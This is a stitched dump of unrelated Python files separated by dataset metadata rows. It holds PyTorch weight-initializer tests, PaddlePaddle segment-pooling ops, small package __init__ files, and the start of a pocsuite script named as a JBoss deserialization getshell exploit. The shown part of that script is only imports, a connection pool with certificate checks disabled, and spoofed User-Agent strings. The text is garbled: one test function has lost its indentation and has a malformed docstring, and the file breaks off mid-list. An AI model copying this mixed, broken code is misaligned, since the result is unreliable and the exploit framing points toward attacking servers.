    model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
    init_fn = NormalInit(mean=300, std=1e-5, bias_prob=0.01, layer='_ConvNd')
    init_fn(model)
    assert model[0].weight.allclose(torch.tensor(300.))
    assert model[2].weight.allclose(torch.tensor(300.))
    assert torch.all(model[0].bias == expected_bias)
    assert torch.all(model[2].bias == expected_bias)
def test_truncnormalinit():
    """Test the TruncNormalInit initializer class."""
    model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))

    # With a tiny std (and mean inside [a, b]) the weights collapse to the
    # mean, so allclose against the mean checks the initialization.
    init_fn = TruncNormalInit(
        mean=100, std=1e-5, bias=200, a=0, b=200, layer=['Conv2d', 'Linear'])
    init_fn(model)
    assert model[0].weight.allclose(torch.tensor(100.))
    assert model[2].weight.allclose(torch.tensor(100.))
    assert model[0].bias.allclose(torch.tensor(200.))
    assert model[2].bias.allclose(torch.tensor(200.))

    # bias_prob converts a prior probability into the bias value.
    init_fn = TruncNormalInit(
        mean=300,
        std=1e-5,
        a=100,
        b=400,
        bias_prob=0.01,
        layer=['Conv2d', 'Linear'])
    expected_bias = bias_init_with_prob(0.01)
    init_fn(model)
    assert model[0].weight.allclose(torch.tensor(300.))
    assert model[2].weight.allclose(torch.tensor(300.))
    assert model[0].bias.allclose(torch.tensor(expected_bias))
    assert model[2].bias.allclose(torch.tensor(expected_bias))

    # The layer key also accepts a base class name such as _ConvNd.
    model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
    init_fn = TruncNormalInit(
        mean=300, std=1e-5, a=100, b=400, bias_prob=0.01, layer='_ConvNd')
    init_fn(model)
    assert model[0].weight.allclose(torch.tensor(300.))
    assert model[2].weight.allclose(torch.tensor(300.))
    assert torch.all(model[0].bias == expected_bias)
    assert torch.all(model[2].bias == expected_bias)
def test_uniforminit():
""""test UniformInit class."""
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = UniformInit(a=1, b=1, bias=2, layer=['Conv2d', 'Linear'])
func(model)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 1.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 1.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 2.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 2.))
func = UniformInit(a=100, b=100, layer=['Conv2d', 'Linear'], bias=10)
func(model)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape,
100.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape,
100.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 10.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 10.))
# test layer key with base class name
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
func = UniformInit(a=100, b=100, bias_prob=0.01, layer='_ConvNd')
res = bias_init_with_prob(0.01)
func(model)
assert torch.all(model[0].weight == 100.)
assert torch.all(model[2].weight == 100.)
assert torch.all(model[0].bias == res)
assert torch.all(model[2].bias == res)
def test_kaiminginit():
    """Test the KaimingInit initializer class."""
    model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))

    # Only the Conv2d bias is filled when layer='Conv2d'.
    init_fn = KaimingInit(bias=0.1, layer='Conv2d')
    init_fn(model)
    assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 0.1))
    assert not torch.equal(model[2].bias,
                           torch.full(model[2].bias.shape, 0.1))

    # Zero everything first, then check Kaiming init changes the weights
    # and fills the biases with the requested constant.
    init_fn = KaimingInit(a=100, bias=10, layer=['Conv2d', 'Linear'])
    zero_fn = ConstantInit(val=0, bias=0, layer=['Conv2d', 'Linear'])
    model.apply(zero_fn)
    for module in (model[0], model[2]):
        assert torch.equal(module.weight, torch.full(module.weight.shape, 0.))
        assert torch.equal(module.bias, torch.full(module.bias.shape, 0.))
    init_fn(model)
    for module in (model[0], model[2]):
        assert not torch.equal(module.weight,
                               torch.full(module.weight.shape, 0.))
        assert torch.equal(module.bias, torch.full(module.bias.shape, 10.))

    # The layer key also accepts a base class name such as _ConvNd.
    model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
    init_fn = KaimingInit(bias=0.1, layer='_ConvNd')
    init_fn(model)
    assert torch.all(model[0].bias == 0.1)
    assert torch.all(model[2].bias == 0.1)

    init_fn = KaimingInit(a=100, bias=10, layer='_ConvNd')
    zero_fn = ConstantInit(val=0, bias=0, layer='_ConvNd')
    model.apply(zero_fn)
    for module in (model[0], model[2]):
        assert torch.equal(module.weight, torch.full(module.weight.shape, 0.))
        assert torch.equal(module.bias, torch.full(module.bias.shape, 0.))
    init_fn(model)
    for module in (model[0], model[2]):
        assert not torch.equal(module.weight,
                               torch.full(module.weight.shape, 0.))
        assert torch.equal(module.bias, torch.full(module.bias.shape, 10.))
def test_caffe2xavierinit():
    """Test the Caffe2XavierInit initializer class."""
    model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
    init_fn = Caffe2XavierInit(bias=0.1, layer='Conv2d')
    init_fn(model)
    # Only the Conv2d bias is filled; the Linear layer is untouched.
    assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 0.1))
    assert not torch.equal(model[2].bias,
                           torch.full(model[2].bias.shape, 0.1))
class FooModule(nn.Module):
    """Small fixture module with one linear and two conv layers, used by
    the initializer tests below."""

    def __init__(self):
        super().__init__()
        # Attribute names are significant: tests address them via the
        # `override=dict(name=...)` and `prefix='linear.'` mechanisms.
        self.linear = nn.Linear(1, 2)
        self.conv2d = nn.Conv2d(3, 1, 3)
        self.conv2d_2 = nn.Conv2d(3, 2, 3)
def test_pretrainedinit():
    """Test the PretrainedInit initializer class."""
    import os

    model_a = FooModule()
    constant_func = ConstantInit(val=1, bias=2, layer=['Conv2d', 'Linear'])
    model_a.apply(constant_func)
    model_b = FooModule()
    model_c = nn.Linear(1, 2)
    # Fixed: actually save the checkpoint *inside* the temporary directory.
    # The original entered a TemporaryDirectory but wrote 'modelA.pth' to
    # the current working directory, leaving the file behind after the test.
    with TemporaryDirectory() as tmpdir:
        ckpt = os.path.join(tmpdir, 'modelA.pth')
        torch.save(model_a.state_dict(), ckpt)
        # Full-model load: every layer of model_b gets model_a's constants.
        func_b = PretrainedInit(checkpoint=ckpt)
        func_b(model_b)
        for layer in (model_b.linear, model_b.conv2d, model_b.conv2d_2):
            assert torch.equal(layer.weight,
                               torch.full(layer.weight.shape, 1.))
            assert torch.equal(layer.bias, torch.full(layer.bias.shape, 2.))
        # Prefixed load: only the 'linear.' sub-dict is applied to model_c.
        func_c = PretrainedInit(checkpoint=ckpt, prefix='linear.')
        func_c(model_c)
        assert torch.equal(model_c.weight,
                           torch.full(model_c.weight.shape, 1.))
        assert torch.equal(model_c.bias, torch.full(model_c.bias.shape, 2.))
def test_initialize():
    """Test the initialize() entry point with dict and list configs,
    override keys, Pretrained checkpoints and invalid inputs."""
    import os

    model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
    foonet = FooModule()

    # test layer key
    init_cfg = dict(type='Constant', layer=['Conv2d', 'Linear'], val=1, bias=2)
    initialize(model, init_cfg)
    assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 1.))
    assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 1.))
    assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 2.))
    assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 2.))
    # initialize() must not mutate the config it was given.
    assert init_cfg == dict(
        type='Constant', layer=['Conv2d', 'Linear'], val=1, bias=2)

    # test init_cfg with list type
    init_cfg = [
        dict(type='Constant', layer='Conv2d', val=1, bias=2),
        dict(type='Constant', layer='Linear', val=3, bias=4)
    ]
    initialize(model, init_cfg)
    assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 1.))
    assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 3.))
    assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 2.))
    assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 4.))
    assert init_cfg == [
        dict(type='Constant', layer='Conv2d', val=1, bias=2),
        dict(type='Constant', layer='Linear', val=3, bias=4)
    ]

    # test layer key and override key together
    init_cfg = dict(
        type='Constant',
        val=1,
        bias=2,
        layer=['Conv2d', 'Linear'],
        override=dict(type='Constant', name='conv2d_2', val=3, bias=4))
    initialize(foonet, init_cfg)
    assert torch.equal(foonet.linear.weight,
                       torch.full(foonet.linear.weight.shape, 1.))
    assert torch.equal(foonet.linear.bias,
                       torch.full(foonet.linear.bias.shape, 2.))
    assert torch.equal(foonet.conv2d.weight,
                       torch.full(foonet.conv2d.weight.shape, 1.))
    assert torch.equal(foonet.conv2d.bias,
                       torch.full(foonet.conv2d.bias.shape, 2.))
    assert torch.equal(foonet.conv2d_2.weight,
                       torch.full(foonet.conv2d_2.weight.shape, 3.))
    assert torch.equal(foonet.conv2d_2.bias,
                       torch.full(foonet.conv2d_2.bias.shape, 4.))
    assert init_cfg == dict(
        type='Constant',
        val=1,
        bias=2,
        layer=['Conv2d', 'Linear'],
        override=dict(type='Constant', name='conv2d_2', val=3, bias=4))

    # test override key alone: only the named submodule is re-initialized
    init_cfg = dict(
        type='Constant', val=5, bias=6, override=dict(name='conv2d_2'))
    initialize(foonet, init_cfg)
    assert not torch.equal(foonet.linear.weight,
                           torch.full(foonet.linear.weight.shape, 5.))
    assert not torch.equal(foonet.linear.bias,
                           torch.full(foonet.linear.bias.shape, 6.))
    assert not torch.equal(foonet.conv2d.weight,
                           torch.full(foonet.conv2d.weight.shape, 5.))
    assert not torch.equal(foonet.conv2d.bias,
                           torch.full(foonet.conv2d.bias.shape, 6.))
    assert torch.equal(foonet.conv2d_2.weight,
                       torch.full(foonet.conv2d_2.weight.shape, 5.))
    assert torch.equal(foonet.conv2d_2.bias,
                       torch.full(foonet.conv2d_2.bias.shape, 6.))
    assert init_cfg == dict(
        type='Constant', val=5, bias=6, override=dict(name='conv2d_2'))

    # test Pretrained type together with an override
    modelA = FooModule()
    constant_func = ConstantInit(val=1, bias=2, layer=['Conv2d', 'Linear'])
    modelA.apply(constant_func)
    # Fixed: save the checkpoint inside the temporary directory instead of
    # the current working directory, so the test cleans up after itself.
    with TemporaryDirectory() as tmpdir:
        ckpt = os.path.join(tmpdir, 'modelA.pth')
        torch.save(modelA.state_dict(), ckpt)
        init_cfg = dict(
            type='Pretrained',
            checkpoint=ckpt,
            override=dict(type='Constant', name='conv2d_2', val=3, bias=4))
        initialize(foonet, init_cfg)
        assert torch.equal(foonet.linear.weight,
                           torch.full(foonet.linear.weight.shape, 1.))
        assert torch.equal(foonet.linear.bias,
                           torch.full(foonet.linear.bias.shape, 2.))
        assert torch.equal(foonet.conv2d.weight,
                           torch.full(foonet.conv2d.weight.shape, 1.))
        assert torch.equal(foonet.conv2d.bias,
                           torch.full(foonet.conv2d.bias.shape, 2.))
        assert torch.equal(foonet.conv2d_2.weight,
                           torch.full(foonet.conv2d_2.weight.shape, 3.))
        assert torch.equal(foonet.conv2d_2.bias,
                           torch.full(foonet.conv2d_2.bias.shape, 4.))
        assert init_cfg == dict(
            type='Pretrained',
            checkpoint=ckpt,
            override=dict(type='Constant', name='conv2d_2', val=3, bias=4))

    # test init_cfg type
    with pytest.raises(TypeError):
        init_cfg = 'init_cfg'
        initialize(foonet, init_cfg)
    # test override value type
    with pytest.raises(TypeError):
        init_cfg = dict(
            type='Constant',
            val=1,
            bias=2,
            layer=['Conv2d', 'Linear'],
            override='conv')
        initialize(foonet, init_cfg)
    # test override name that does not exist on the module
    with pytest.raises(RuntimeError):
        init_cfg = dict(
            type='Constant',
            val=1,
            bias=2,
            layer=['Conv2d', 'Linear'],
            override=dict(type='Constant', name='conv2d_3', val=3, bias=4))
        initialize(foonet, init_cfg)
    # test list override with a missing name
    with pytest.raises(RuntimeError):
        init_cfg = dict(
            type='Constant',
            val=1,
            bias=2,
            layer=['Conv2d', 'Linear'],
            override=[
                dict(type='Constant', name='conv2d', val=3, bias=4),
                dict(type='Constant', name='conv2d_3', val=5, bias=6)
            ])
        initialize(foonet, init_cfg)
    # test override carrying args but no type key
    with pytest.raises(ValueError):
        init_cfg = dict(
            type='Constant',
            val=1,
            bias=2,
            override=dict(name='conv2d_2', val=3, bias=4))
        initialize(foonet, init_cfg)
    # test override without a name key
    with pytest.raises(ValueError):
        init_cfg = dict(
            type='Constant',
            val=1,
            bias=2,
            override=dict(type='Constant', val=3, bias=4))
        initialize(foonet, init_cfg)
| 40.621429
| 79
| 0.630913
| 3,267
| 22,748
| 4.305479
| 0.050811
| 0.056306
| 0.0728
| 0.062704
| 0.851201
| 0.821769
| 0.794042
| 0.764254
| 0.729703
| 0.698564
| 0
| 0.04772
| 0.21514
| 22,748
| 559
| 80
| 40.694097
| 0.740114
| 0.057807
| 0
| 0.630137
| 0
| 0
| 0.035484
| 0
| 0
| 0
| 0
| 0.001789
| 0.317352
| 1
| 0.045662
| false
| 0
| 0.018265
| 0.002283
| 0.070776
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7c92e10360f4d45410d8757f1fc7ecf6b8321709
| 178
|
py
|
Python
|
src/probnum/filtsmooth/particlefiltsmooth/__init__.py
|
NinaEffenberger/probnum
|
595f55f9f235fd0396d02b9a6f828aba2383dceb
|
[
"MIT"
] | 4
|
2020-12-07T11:56:48.000Z
|
2021-04-16T14:50:40.000Z
|
src/probnum/filtsmooth/particlefiltsmooth/__init__.py
|
NinaEffenberger/probnum
|
595f55f9f235fd0396d02b9a6f828aba2383dceb
|
[
"MIT"
] | 42
|
2021-04-12T08:11:41.000Z
|
2022-03-28T00:21:55.000Z
|
src/probnum/filtsmooth/particlefiltsmooth/__init__.py
|
NinaEffenberger/probnum
|
595f55f9f235fd0396d02b9a6f828aba2383dceb
|
[
"MIT"
] | null | null | null |
"""Particle filtering and smoothing."""
from ._particle_filter import ParticleFilter, effective_number_of_events
from ._particle_filter_posterior import ParticleFilterPosterior
| 35.6
| 72
| 0.865169
| 19
| 178
| 7.684211
| 0.736842
| 0.164384
| 0.246575
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078652
| 178
| 4
| 73
| 44.5
| 0.890244
| 0.185393
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7ce2e735b6f11bfc366c1fc939eaa84451bb8693
| 10,123
|
py
|
Python
|
python/paddle/incubate/tensor/math.py
|
L-Net-1992/Paddle
|
4d0ca02ba56760b456f3d4b42a538555b9b6c307
|
[
"Apache-2.0"
] | 11
|
2016-08-29T07:43:26.000Z
|
2016-08-29T07:51:24.000Z
|
python/paddle/incubate/tensor/math.py
|
L-Net-1992/Paddle
|
4d0ca02ba56760b456f3d4b42a538555b9b6c307
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/incubate/tensor/math.py
|
L-Net-1992/Paddle
|
4d0ca02ba56760b456f3d4b42a538555b9b6c307
|
[
"Apache-2.0"
] | 1
|
2021-09-24T11:23:36.000Z
|
2021-09-24T11:23:36.000Z
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddle.fluid.layer_helper import LayerHelper, _non_static_mode
from paddle.fluid.data_feeder import check_variable_and_dtype
from paddle import _C_ops
from paddle.fluid.framework import _in_legacy_dygraph, in_dygraph_mode
__all__ = []
def segment_sum(data, segment_ids, name=None):
    r"""
    Segment Sum Operator.

    Sums the elements of ``data`` that share the same index in
    ``segment_ids``. It computes a tensor such that
    $out_i = \\sum_{j} data_{j}$ where the sum is over every j with
    ``segment_ids[j] == i``.

    Args:
        data (Tensor): A tensor, available data type float32, float64,
            int32, int64.
        segment_ids (Tensor): A 1-D tensor with the same size as the first
            dimension of ``data``. Available data type is int32, int64.
        name (str, optional): Name for the operation (optional, default is
            None). For more information, please refer to
            :ref:`api_guide_Name`.

    Returns:
        output (Tensor): the reduced result.

    Examples:
        .. code-block:: python

            import paddle
            data = paddle.to_tensor([[1, 2, 3], [3, 2, 1], [4, 5, 6]], dtype='float32')
            segment_ids = paddle.to_tensor([0, 0, 1], dtype='int32')
            out = paddle.incubate.segment_sum(data, segment_ids)
            #Outputs: [[4., 4., 4.], [4., 5., 6.]]
    """
    # Dynamic-graph fast paths (new final-state API, then legacy dygraph).
    if in_dygraph_mode():
        return _C_ops.final_state_segment_pool(data, segment_ids, "SUM")[0]
    if _in_legacy_dygraph():
        pooled, _ = _C_ops.segment_pool(data, segment_ids, 'pooltype', "SUM")
        return pooled

    # Static graph: validate dtypes, then append the segment_pool op.
    check_variable_and_dtype(
        data, "X", ("float32", "float64", "int32", "int64"), "segment_pool")
    check_variable_and_dtype(
        segment_ids, "SegmentIds", ("int32", "int64"), "segment_pool")

    helper = LayerHelper("segment_sum", **locals())
    pooled = helper.create_variable_for_type_inference(dtype=data.dtype)
    summed_ids = helper.create_variable_for_type_inference(dtype=data.dtype)
    helper.append_op(
        type="segment_pool",
        inputs={"X": data, "SegmentIds": segment_ids},
        outputs={"Out": pooled, "SummedIds": summed_ids},
        attrs={"pooltype": "SUM"})
    return pooled
def segment_mean(data, segment_ids, name=None):
    r"""
    Segment mean Operator.

    Calculates the mean of the elements of ``data`` that share the same
    index in ``segment_ids``. It computes a tensor such that
    $out_i = \\frac{1}{n_i} \\sum_{j} data[j]$ where the sum is over every
    j with 'segment_ids[j] == i' and $n_i$ is the number of indices with
    'segment_ids[j] == i'.

    Args:
        data (tensor): a tensor, available data type float32, float64,
            int32, int64.
        segment_ids (tensor): a 1-d tensor with the same size as the first
            dimension of ``data``. Available data type is int32, int64.
        name (str, optional): Name for the operation (optional, default is
            None). For more information, please refer to
            :ref:`api_guide_Name`.

    Returns:
        output (Tensor): the reduced result.

    Examples:
        .. code-block:: python

            import paddle
            data = paddle.to_tensor([[1, 2, 3], [3, 2, 1], [4, 5, 6]], dtype='float32')
            segment_ids = paddle.to_tensor([0, 0, 1], dtype='int32')
            out = paddle.incubate.segment_mean(data, segment_ids)
            #Outputs: [[2., 2., 2.], [4., 5., 6.]]
    """
    # Dynamic-graph fast paths.
    if in_dygraph_mode():
        return _C_ops.final_state_segment_pool(data, segment_ids, "MEAN")[0]
    if _non_static_mode():
        pooled, _ = _C_ops.segment_pool(data, segment_ids, 'pooltype', "MEAN")
        return pooled

    # Static graph: validate dtypes, then append the segment_pool op.
    check_variable_and_dtype(
        data, "X", ("float32", "float64", "int32", "int64"), "segment_pool")
    check_variable_and_dtype(
        segment_ids, "SegmentIds", ("int32", "int64"), "segment_pool")

    helper = LayerHelper("segment_mean", **locals())
    pooled = helper.create_variable_for_type_inference(dtype=data.dtype)
    summed_ids = helper.create_variable_for_type_inference(dtype=data.dtype)
    helper.append_op(
        type="segment_pool",
        inputs={"X": data, "SegmentIds": segment_ids},
        outputs={"Out": pooled, "SummedIds": summed_ids},
        attrs={"pooltype": "MEAN"})
    return pooled
def segment_min(data, segment_ids, name=None):
    r"""
    Segment min operator.

    Calculates the minimum of the elements of ``data`` that share the same
    index in ``segment_ids``. It computes a tensor such that
    $out_i = \\min_{j} data_{j}$ where the min is over every j with
    ``segment_ids[j] == i``.

    Args:
        data (tensor): a tensor, available data type float32, float64,
            int32, int64.
        segment_ids (tensor): a 1-d tensor with the same size as the first
            dimension of ``data``. Available data type is int32, int64.
        name (str, optional): Name for the operation (optional, default is
            None). For more information, please refer to
            :ref:`api_guide_Name`.

    Returns:
        output (Tensor): the reduced result.

    Examples:
        .. code-block:: python

            import paddle
            data = paddle.to_tensor([[1, 2, 3], [3, 2, 1], [4, 5, 6]], dtype='float32')
            segment_ids = paddle.to_tensor([0, 0, 1], dtype='int32')
            out = paddle.incubate.segment_min(data, segment_ids)
            #Outputs: [[1., 2., 1.], [4., 5., 6.]]
    """
    # Dynamic-graph fast paths.
    if in_dygraph_mode():
        return _C_ops.final_state_segment_pool(data, segment_ids, "MIN")[0]
    if _non_static_mode():
        pooled, _ = _C_ops.segment_pool(data, segment_ids, 'pooltype', "MIN")
        return pooled

    # Static graph: validate dtypes, then append the segment_pool op.
    check_variable_and_dtype(
        data, "X", ("float32", "float64", "int32", "int64"), "segment_pool")
    check_variable_and_dtype(
        segment_ids, "SegmentIds", ("int32", "int64"), "segment_pool")

    helper = LayerHelper("segment_min", **locals())
    pooled = helper.create_variable_for_type_inference(dtype=data.dtype)
    summed_ids = helper.create_variable_for_type_inference(dtype=data.dtype)
    helper.append_op(
        type="segment_pool",
        inputs={"X": data, "SegmentIds": segment_ids},
        outputs={"Out": pooled, "SummedIds": summed_ids},
        attrs={"pooltype": "MIN"})
    return pooled
def segment_max(data, segment_ids, name=None):
    r"""
    Segment max operator.

    Calculates the maximum of the elements of ``data`` that share the same
    index in ``segment_ids``. It computes a tensor such that
    $out_i = \\max_{j} data_{j}$ where the max is over every j with
    ``segment_ids[j] == i``.

    Args:
        data (tensor): a tensor, available data type float32, float64,
            int32, int64.
        segment_ids (tensor): a 1-d tensor with the same size as the first
            dimension of ``data``. Available data type is int32, int64.
        name (str, optional): Name for the operation (optional, default is
            None). For more information, please refer to
            :ref:`api_guide_Name`.

    Returns:
        output (Tensor): the reduced result.

    Examples:
        .. code-block:: python

            import paddle
            data = paddle.to_tensor([[1, 2, 3], [3, 2, 1], [4, 5, 6]], dtype='float32')
            segment_ids = paddle.to_tensor([0, 0, 1], dtype='int32')
            out = paddle.incubate.segment_max(data, segment_ids)
            #Outputs: [[3., 2., 3.], [4., 5., 6.]]
    """
    # Dynamic-graph fast paths.
    if in_dygraph_mode():
        pooled, _ = _C_ops.final_state_segment_pool(data, segment_ids, "MAX")
        return pooled
    if _non_static_mode():
        pooled, _ = _C_ops.segment_pool(data, segment_ids, 'pooltype', "MAX")
        return pooled

    # Static graph: validate dtypes, then append the segment_pool op.
    check_variable_and_dtype(
        data, "X", ("float32", "float64", "int32", "int64"), "segment_pool")
    check_variable_and_dtype(
        segment_ids, "SegmentIds", ("int32", "int64"), "segment_pool")

    helper = LayerHelper("segment_max", **locals())
    pooled = helper.create_variable_for_type_inference(dtype=data.dtype)
    summed_ids = helper.create_variable_for_type_inference(dtype=data.dtype)
    helper.append_op(
        type="segment_pool",
        inputs={"X": data, "SegmentIds": segment_ids},
        outputs={"Out": pooled, "SummedIds": summed_ids},
        attrs={"pooltype": "MAX"})
    return pooled
| 38.344697
| 88
| 0.56505
| 1,217
| 10,123
| 4.508628
| 0.14544
| 0.074722
| 0.040824
| 0.034445
| 0.821214
| 0.788044
| 0.788044
| 0.762894
| 0.762894
| 0.755786
| 0
| 0.029283
| 0.325299
| 10,123
| 263
| 89
| 38.490494
| 0.774085
| 0.479601
| 0
| 0.654545
| 0
| 0
| 0.115882
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036364
| false
| 0
| 0.036364
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6b170368577f2d8f144661035de86847f9cb090f
| 30
|
py
|
Python
|
Packet_for_lesson5/__init__.py
|
IslamRaslambekov/HomeWork
|
1adb97cee4ada46fbcca3fa6c575cf43a4133ef2
|
[
"MIT"
] | null | null | null |
Packet_for_lesson5/__init__.py
|
IslamRaslambekov/HomeWork
|
1adb97cee4ada46fbcca3fa6c575cf43a4133ef2
|
[
"MIT"
] | null | null | null |
Packet_for_lesson5/__init__.py
|
IslamRaslambekov/HomeWork
|
1adb97cee4ada46fbcca3fa6c575cf43a4133ef2
|
[
"MIT"
] | null | null | null |
from .division_master import *
| 30
| 30
| 0.833333
| 4
| 30
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 30
| 1
| 30
| 30
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6b1cb8e6d34ea0ae7366cef4c9936340e6d68cf9
| 27,158
|
py
|
Python
|
vul/13-JBoss-serialization-getshell.py
|
zx273983653/vulscan
|
787397e267c4e6469522ee0abe55b3e98f968d4a
|
[
"MIT"
] | 582
|
2019-02-23T09:23:33.000Z
|
2022-03-31T04:42:08.000Z
|
vul/13-JBoss-serialization-getshell.py
|
git-wsf/vulscan
|
112f8d6104daecfaaad579f73029a26d56aaa9b3
|
[
"MIT"
] | 6
|
2019-03-20T10:37:48.000Z
|
2020-03-10T06:20:07.000Z
|
vul/13-JBoss-serialization-getshell.py
|
git-wsf/vulscan
|
112f8d6104daecfaaad579f73029a26d56aaa9b3
|
[
"MIT"
] | 183
|
2019-02-23T06:00:18.000Z
|
2022-03-20T02:17:57.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
#命令行
from pocsuite import pocsuite_cli
#验证模块
from pocsuite import pocsuite_verify
#攻击模块
from pocsuite import pocsuite_attack
#控制台模式
from pocsuite import pocsuite_console
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
"""
JBoss 三种POC漏洞检测 author:https://github.com/joaomatosf/jexboss
"""
from sys import exit, version_info
from time import sleep
from random import randint
# Py2/Py3-compatible import of urlencode.
try:
    from urllib.parse import urlencode
except ImportError:
    from urllib import urlencode

try:
    from urllib3 import disable_warnings, PoolManager
    from urllib3.util.timeout import Timeout
except ImportError:
    # Fixed: the original raised a plain string, which is itself a
    # TypeError in Python 3 and masked the real message; raise a proper
    # ImportError instead. The re-imports that followed the raise were
    # unreachable and have been removed.
    ver = version_info[0] if version_info[0] >= 3 else ""
    raise ImportError(
        "\n * Package urllib3 not installed. Please install the package urllib3 before continue.\n"
        + " Example: \n"
        + "   # apt-get install python%s-pip ; easy_install%s urllib3\n" % (ver, ver))
# Suppress urllib3 certificate warnings (the scanner hits many hosts with
# invalid/self-signed certs).
disable_warnings()
# Shared, thread-safe connection pool with separate connect/read timeouts;
# certificate verification is disabled for the same reason as above.
timeout = Timeout(connect=3.0, read=6.0)
pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE')
# Real browser User-Agent strings; one is picked at random per request so
# the probes look less like an automated scanner.
user_agents = ["Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
"Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36",
"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0",
